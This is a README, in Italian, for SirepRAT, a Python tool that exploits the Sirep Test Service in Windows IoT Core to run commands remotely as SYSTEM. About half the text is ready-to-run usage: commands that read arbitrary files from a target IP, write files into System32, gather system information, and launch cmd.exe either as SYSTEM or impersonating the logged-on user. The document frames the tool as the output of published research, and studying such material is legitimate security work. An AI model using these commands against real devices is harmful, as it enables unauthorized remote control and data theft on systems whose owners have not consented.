
Esecuzione remota di comandi come SYSTEM su Windows IoT Core (release disponibili per Python2.7 e Python3)

SirepRAT offre funzionalità RAT complete senza la necessità di scrivere un vero malware RAT sul target.
Il metodo sfrutta il Sirep Test Service che è integrato e in esecuzione nelle immagini ufficiali offerte sul sito di Microsoft. Questo servizio è la parte client della configurazione HLK che si può creare per eseguire test di driver/hardware sul dispositivo IoT. Implementa il protocollo Sirep/WPCon/TShell.
Abbiamo analizzato il protocollo Sirep/WPCon e dimostrato come questo protocollo esponga un'interfaccia di comando remota per gli attaccanti, che include capacità RAT come il recupero/inserimento di file arbitrari in posizioni arbitrarie e l'ottenimento di informazioni di sistema.
Sulla base dei risultati estratti da questa ricerca sul servizio e sul protocollo, abbiamo creato un semplice strumento Python che consente di sfruttarli utilizzando i diversi comandi supportati. Lo abbiamo chiamato SirepRAT.
Offre un'interfaccia utente semplice e intuitiva per inviare comandi a un target Windows IoT Core. Funziona su qualsiasi dispositivo collegato via cavo che esegue Windows IoT Core con un'immagine ufficiale Microsoft.
Slide e white paper della ricerca sono nella cartella docs
pip install -r requirements.txt
python SirepRAT.py 192.168.3.17 GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" --v
python SirepRAT.py 192.168.3.17 PutFileOnDevice --remote_path "C:\Windows\System32\uploaded.txt" --data "Hello IoT world!"
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"
Con argomenti, impersonando l'utente attualmente connesso:
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"
(Prova a eseguirlo senza il flag as_logged_on_user per dimostrare la capacità di esecuzione come SYSTEM)
python SirepRAT.py 192.168.3.17 GetSystemInformationFromDevice
python SirepRAT.py 192.168.3.17 GetFileInformationFromDevice --remote_path "C:\Windows\System32\ntoskrnl.exe"
python SirepRAT.py --help
Dor Azouri (@bemikre)
movatica (@movatica) - porting a python 3! (alla fine del 2020)
BSD 3 - licenza "New" o "Revised"